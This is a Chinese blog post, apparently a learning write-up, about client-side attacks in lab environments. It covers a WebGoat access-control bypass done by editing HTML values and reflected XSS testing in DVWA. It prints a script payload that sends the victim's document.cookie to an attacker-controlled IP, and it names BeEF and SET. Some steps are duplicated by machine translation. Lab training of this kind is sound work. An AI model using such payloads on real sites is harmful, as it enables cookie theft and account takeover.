使用跨脚本攻击客户端

Kali使用挂脚本攻击客户端:
     挂脚本攻击是一种利用安全漏洞或弱点来入侵客户端的方式。Kali是一种专门设计用于渗透测试和安全评估的操作系统,它提供了大量的攻击工具和脚本。

    在使用Kali进行挂脚本攻击之前,首先需要进行目标收集和信息搜集。这包括了确定目标的IP地址、端口号、操作系统和安全漏洞。

     Kali提供了各种挂脚本攻击工具,如Metasploit、Social Engineering Toolkit(SET)、BeEF等。Metasploit是一个功能强大的渗透测试框架,它可以利用已知的漏洞来入侵客户端。SET是一个社会工程学攻击工具,它可以通过钓鱼攻击和恶意网站来欺骗用户获取其敏感信息。BeEF是一个浏览器漏洞实时框架,它可以利用浏览器漏洞来控制用户的浏览器。

      挂脚本攻击的成功与否取决于目标的安全性水平和用户的安全意识。因此,在进行挂脚本攻击之前,需要充分了解目标系统和用户的行为习惯,以制定相应的攻击策略。

     在进行挂脚本攻击之前,一定要确保自己的行为是合法的,并且获得了相应的授权。未经授权进行挂脚本攻击是违法行为,可能会导致法律责任和严重后果。
 

一.浏览器绕过客户端控制

客户端和服务端的处理同时在Web应用中发生,客户端通常用于接收呈现给用户的信息,值得一提的是一些输入验证与认证授权会在客户端执行
首先看一个WebGoat的实例:
1.登陆WebGoat,点击 Access Control Flaws,转到 LAB:Role Based AccessControl→Stage 1:Bypass Business Layer Access Control(阶段1:绕过业务层访问控制)


2.使用tomcat的登陆凭证(tom,tom)登陆这个表单,并用F12启用firefox 的开发者工具
3.来检查一下员工表单。我们可以看到一个值为105的html标签:Tom Cat(employee)


4.接着转到开发者工具中的Network选项卡并单击ViewProfile,可以注意到请求中有一个名为employee_id的参数,其值为105: 

5.单击ListStaff返回列表。
6.更改为开发者工具中的Inspector选项卡。
7.双击标记的值(105)将其改变为101。尝试一下是否可以通过改变这个值查看其他用户的信息。
8.再次点击 ViewProfile :


9.现在,WebGoat给的目标是使用tom的账户删除tom 的个人信息。来尝试一下,点击ListStaff返回列表 9.现在,Webgoat给的目标是使用汤姆的账户删除汤姆的个人信息。来尝试一下,点击ListStaff返回列表
10.注意 ViewProfile按钮 10.注意视图概要文件按钮
11.它的名称是action,值为 ViewProfile,我们将其改为 DeleteProfile 11.它的名称是操作,值为视图概要文件,我们将其改为DeleteProfile


12.可以发现按钮上面的字已成功更改,点击 DeleteProfile后,即可完成目标任务。

二.识别跨站脚本漏洞

1.我们将使用易受攻击的 Web应用程序(DVWA)来完成这个小节。使用默认的管理凭据( admin作为用户名和密码)登录,然后到xSS reflected(反射 XSS). 
⒉.测试漏洞的第一步是观察应用程序的正常响应。在文本框中填写一个名称字符串并且点击提交。在这里我们填写的是:Bob 


3.应用程序使用的是我们输入的字符串。如果我们引入一些特殊字符或者数字而不是一个有效的名称字符串,会发生什么,输入:<'this is the first test'>

4.现在,我们看到我们在文本框输入的任何内容都将出现在响应中;也就是说,它成为了响应HTML页面的一部分。让我们检查页面的源代码来分析它是如何显示信息的:

5.3利用XSS获取Cookie 5.3利用XSS获取Cookie
前几章中,我们知道了攻击者可以使用Cookie来冒充当前用户的身份,在上一章节我们也简单地引入了XSS的基本概念。如果目标站点存在XSS漏洞并且Cookie 并没有开启 http-only的话,那么它们二者将是Web安全的巨大隐患。
本章就带大家一起来学习如何使用XSS来获取用户的cookie. 本章就带大家一起来学习如何使用xss来获取用户的cookie.

在Kali Linux 的终端上运行以下命令来开启 HTTP服务;

2、然后登陆DvwA,再转到xSS reflection 下;


3、在文本框中输入以下内容(192.168.56.10为Kali主机I地址):
Bob<script>document.write('<img src="http://192.168.56.10:88/"+document.cookie+'">');</script>

查看终端,你会发现出现以下信息;

源代码显示,在输出中没有对特殊字符进行编码,我们发送的特殊字符在没有任何预先处理的情况下反射回页面。“<”和“>”是用来定义HTML标签的,所以我们可以引入一些脚本代码。

在Kali中使用跨脚本攻击进行学习收获了以下几点

1.了解XSS的原理:在开始学习XSS之前,我首先学习了XSS的基本原理。XSS攻击利用了应用程序对用户输入的不充分验证,使得恶意脚本可以在网页上执行,从而导致可能的攻击。

2. 寻找漏洞:在Kali中,我使用了一些工具和技术来寻找潜在的XSS漏洞。例如,我使用了Burp Suite来拦截和分析Web应用程序的网络流量,从而发现输入点和潜在的漏洞。我还使用了一些开源工具,如XSStrike和XSSer等,来自动化寻找XSS漏洞。

3. 演示攻击:一旦发现潜在的XSS漏洞,我使用Kali中的攻击工具来演示攻击。我使用了BeEF(浏览器漏洞框架),利用漏洞创建一个攻击场景,以演示XSS攻击的危害。BeEF可以帮助我在受害者浏览器中执行恶意脚本,并在攻击者端收集有关受害者的信息。

4. 防御技术:学习XSS攻击的同时,我也学习了如何防御XSS攻击。我了解了一些常见的防御技术,如输入验证、输出编码和使用CSP(内容安全策略)等。在使用Kali进行学习时,我还可以使用一些防御工具,如XSSer和XSSer等,来测试和验证我的防御措施。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值